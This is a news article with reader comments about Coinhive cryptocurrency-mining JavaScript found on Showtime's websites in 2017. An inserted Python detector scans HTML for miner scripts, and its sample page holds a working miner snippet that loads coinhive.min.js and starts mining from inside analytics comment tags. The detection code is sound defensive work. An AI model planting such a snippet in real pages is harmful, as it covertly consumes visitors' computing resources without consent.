Showtime Won't Explain Why Its Website Was Hijacking User Browsers To Covertly Mine Cryptocurrency
from the whoops-a-daisy dept
Showtime's websites recently began covertly hijacking user browsers to mine cryptocurrency, and neither Showtime nor its parent company CBS appear interested in explaining how or why it happened. The code in question -- a bit of JavaScript dubbed Coinhive -- was embedded in two different Showtime domains: Showtime.com and Showtimeanytime.com. When a visitor loaded these domains, their browser was hijacked and their computer was forced to help mine Monero, a new privacy-centric alternative to bitcoin currently valued at around $92 each.
The mining software was first noticed by a Twitter user who discovered the Coinhive miner buried early on in the source code:
@briankrebs https://t.co/fnk275wEj9 has a Cryptocurrency miner in the source code pic.twitter.com/XE80sMRJVe
— SkensNet (@skensnet) September 23, 2017
Users weren't alerted that this was happening, and visitors reportedly found the mining software utilized up to 80% of a visiting user's CPU cycles. Such miners can also notably drain battery life for visitors on mobile devices. And as of this writing, Showtime has been completely unwilling to confirm that this occurred, much less explain how the code appeared. The company has refused to respond to numerous requests for comment from a myriad of websites, Techdirt included. The code appeared in the evening of September 23, and had disappeared by the next Monday morning.
It seems relatively unlikely that executives or developers at Showtime thought it would be a good idea to hijack the browsers of potential customers to mine cryptocurrency, leading many to believe that Showtime's servers were likely hacked by somebody looking to covertly make a little extra money:
"The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers' pages, so the code must have come from another source – or was injected by miscreants who had compromised Showtime's systems."
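One defender-side check the passage above suggests: an added example (not code from Techdirt, Showtime, or the article quoted) that scans a page's HTML for script references to the miner's host and reports which comment block each one sits in, so an injected snippet hiding inside an analytics block stands out. The HTML below is constructed; the coinhive.com library path and the `CoinHive.Anonymous` call are the Coinhive library's public ones from 2017, not details taken from the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts serving browser-mining libraries; coinhive.com is the one named in the article.
MINER_HOSTS = {"coinhive.com"}
# Substring that marks an inline miner bootstrap (matched case-insensitively).
MINER_MARKER = "coinhive"


class ScriptAuditor(HTMLParser):
    """Walk a page, remember the most recent HTML comment, and flag scripts
    that load from a miner host or reference the miner inline."""

    def __init__(self):
        super().__init__()
        self.last_comment = None   # context: which comment block we are under
        self.in_script = False
        self.findings = []

    def handle_comment(self, data):
        self.last_comment = data.strip()

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self.in_script = True
        src = dict(attrs).get("src")
        if not src:
            return
        host = (urlparse(src).hostname or "").lower()
        if host in MINER_HOSTS or host.endswith(tuple("." + h for h in MINER_HOSTS)):
            self.findings.append({"kind": "external", "ref": src, "context": self.last_comment})

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # html.parser delivers <script> bodies through handle_data.
        if self.in_script and MINER_MARKER in data.lower():
            self.findings.append({"kind": "inline", "ref": data.strip()[:60], "context": self.last_comment})


def audit_html(html):
    parser = ScriptAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: a miner tucked between analytics comment markers.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<!-- New Relic analytics snippet -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY'); miner.start();</script>
<!-- End New Relic -->
</head><body>Hello</body></html>"""

if __name__ == "__main__":
    for f in audit_html(SAMPLE_PAGE):
        print(f"{f['kind']:8} in comment block [{f['context']}]: {f['ref']}")
```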
That said, it's not impossible that Showtime was running an experiment. Cryptocurrency miners have been making headlines in recent weeks after The Pirate Bay was caught also covertly using Coinhive to hijack visitor browsers to make extra bank. Coinhive only just launched September 14, advertising itself as a creative alternative to the traditional advertising model. But after users over at the Pirate Bay subreddit discovered the practice and began to complain, the website was forced to pull the software from its code and issued a relatively flimsy mea culpa:
"As you may have noticed we are testing a Monero javascript miner. This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running."
Except covertly hijacking a browser with glorified malware obviously isn't a great way of "keeping a site running," especially if websites rushing to embrace Coinhive refuse to let users opt out -- much less inform them this is even happening. Not surprisingly, the recent rise in such stealth cryptocurrency miners has resulted in Adblock Plus moving to help block such hijacks. Malwarebytes analyst Jérôme Segura warns in a blog post that some websites appear unsurprisingly intent on "pushing the limits towards a really bad user experience":
"Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience. The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice."
Again, there are creative alternatives to advertising, and then there's just being an asshole. Hijacking a visitor's browser, CPU and electricity to mine cryptocurrency without informing them -- or letting them opt out -- sits firmly in the latter category.
Filed Under: coinhive, hijacking, javascript, monero, showtime
Companies: cbs, showtime
Reader Comments
Interesting idea though
What if you ran a site and just had clean banner at the top politely asking people to please run the miner to support you? It could actually be a good alternative to ads... So long as it is done clearly upfront and Opt-in only.
Re: Interesting idea though
If it is not shady, spying, controlling, or domineering... they are not interested!
Re: Re: Interesting idea though
But they'd have to inform me upfront, provide an alternative, and the experience has to be positive (none of this buffering and dropping connections crap).
Re: Interesting idea though
I'd like to see the math on that and compare it to ad revenue. Would it be more? Less? Equal to?
I loathe ads with every fiber of my being. But I would definitely volunteer some CPU time during my visits.
Re: Interesting idea though
https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/
Re: Re: Interesting idea though
Any website that runs code that performs work to consume resources at the expense of the consumer, especially without any notice/permission, is against the CFAA.
As a user I expect to pay for the electricity and my costs to connect to the infrastructure and to consume bandwidth to display/interact with the services that a website is offering. The moment they start consuming any of my resources to make them money without first obtaining explicit permission then they are criminally liable for every watt my CPU consumes crunching their code!
I am okay with this replacing ads, but only as long as I am notified that my machine is now being used like this and given a choice to participate or not!
It should be illegal for a website to require someone to allow their computer to become a botnet, even if temporary, to consume a website!
Re: Re: Re: Interesting idea though
This has the makings of a very entertaining slippery slope. Suppose a website could lay out its content properly, as a static page on the server, which is then sent verbatim to clients; or they could indulge their JavaScript addiction and make the client do all the work laying out the page. The latter will be slightly more CPU efficient for the server (although globally much less efficient since each client would perform the work independently, rather than asking the server to do it once), thus saving them money by requiring the client to perform extra work to use the page. Frequently, such client-side rendered pages are at best equivalent, and usually far worse, user experience than doing it properly on the server (hence satisfying your "at the expense of the consumer"). Would that rise to a CFAA claim under your standard? It feels like it shouldn't, but it'd be greatly entertaining if it did, because then most Javascript addicted sites could be chased for CFAA. :D
Re: Re: Re: Re: Interesting idea though
If this is a CFAA violation (which I highly doubt), then a large percentage (probably 70+% of companies) are in violation.
BTW, "asking the server to do it once" is mostly incorrect except on the simplest web pages because injecting any amount of personalization into a page requires the server to render the page for each user.
Re: Re: Re: Re: Re: Interesting idea though
What would happen if the unnecessary activity initiated by the website visited by a user who is not aware of said activity ... were to be found illegal? Who is responsible? How does said user defend against this?
Re: Re: Re: Re: Re: Interesting idea though
Remember, CFAA explicitly states that any usage of a computer that gains access without authorization or attempts to perform a task that exceeds current authorization is abuse.
A website running code to perform its function for serving up content is legit for the obvious reasons. However, the point where the code is now executing something that is "not useful" to that purpose means they exceeded authorization.
Just visiting a page is NOT authorization to just run any code on the visiting machine.
I think the problem here is that once again, we allow companies too much latitude in what they do, just throwing the doors wide open until the abuse is TOO obvious to the point where pretzel logic cannot defend it. This is what created the problem of IoT vulnerability.
Imagine if a store asked all of its customers to process a mathematical equation when they enter the door or face getting kicked out. The more we allow this to continue, the more slippery that slope gets.
Re: Re: Re: Re: Re: Interesting idea though
Actually, my experience has been that they render the HTML exactly zero times, then send a blob of Javascript to the client to construct the page. That's what causes them to be so utterly broken for users who wisely block Javascript. If they did it right, the Javascript would be a progressive enhancement on top of an already usable page. Most sites instead do it dead wrong and make the page totally unusable unless you pull in untrusted scripts from half a dozen different servers.
Personally, I never authorize any site I visit to run Javascript on my computer. Under the frequently twisted interpretation of the CFAA, since I don't want it to happen, and yet it happens, it must be a CFAA violation. ;)
I know. I can dream though.
Sure, personalization requires customization. That's obvious. But how often are personalized pages actually necessary when viewing content that is functionally identical across all users (e.g. listing of current news or thread titles in a forum)? There are way too many sites that have decided that everything that could possibly be personalized must be, whether or not it makes any sense.
Re: Interesting idea though
"We've turned this on guys, please do it" is no less acceptable than "...."
That's a "please help us fix business model problems and oh give us more $$"
Re: Interesting idea though
What would happen if all 10 of those sites tried to make my computer mine crypto-currency for them?
Even the best computers would probably choke and crash under that onslaught.
Or the computer's anti-virus would start alerting the user like crazy that someone's trying to inject malware on your computer.
Re: Re:
JS is a well known vector for malware, many times embedded in ads.
Re: Re: Re: Re:
Been using javascript blocking for years. In the early days I'd have JS disabled entirely in the browser, then used addons that added a button to disable/enable it, then later ones that allowed per-site, then still later the more advanced ones like noscript, policeman, umatrix, and so on that allow blocking not just on the site, but subdomains, cross-site, and so on.
Re:
I think I've seen Mike link to sites that don't work without JS. He must have it enabled. But I don't, and Techdirt still works. Lots of sites haven't tested, obviously -- sometimes the pages are just blank or "links" don't work, sometimes you get an "enable javascript" message (don't -- it only encourages them).
Re: Re:
If you're using Firefox, oftentimes you can click the book icon next to the URL bar and magically the words appear.
I'd love to see the disclaimer for this in the future...
Also something something tracking cookies
[[I Accept]]
Re: Re: What if this was done to a user....
If you're mining it obviously you intend on 'using' it in some way when you sell it/spend it later.
If they're going to abuse technology to steal from us, what's wrong with us doing it to them?
Get used to it
It is called EME in combination with DMCA 1201. See https://boingboing.net/2017/09/18/antifeatures-for-all.html
Once the corporate overlords understand the process it will be everywhere.
Maybe then there will be some political pushback.
Who started this issue recently? The Pirate Bay. Didn't read any outraged comments then, even when they were running a miner that would knock your CPU usage to 100%.
Ahh, the double standards!
Re:
All along you are saying "the legacy industry should learn from piracy". Now they do, and you are upset.
A statement as stupid as 'You were complaining that the restaurant didn't have good food, and now that they've taken to adding a $20 charge to the bill because screw you you're upset?'
Or how about 'People were complaining that movies were too expensive, and now that they've decided to just download them for free you're upset', would you accept that as valid?
Assuming it was done by the ones running the site itself (possible, and their refusal to explain anything certainly isn't helping), then 'Ads aren't bringing in as much, let's hijack our visitors' system resources' is not a valid response, whereas being upset about a site serving up malware most certainly is.
Whether or not The Pirate Bay did something similar is beside the point; it wasn't acceptable then, and it's not acceptable now, so once again your attempt at a 'Gotcha' falls flat.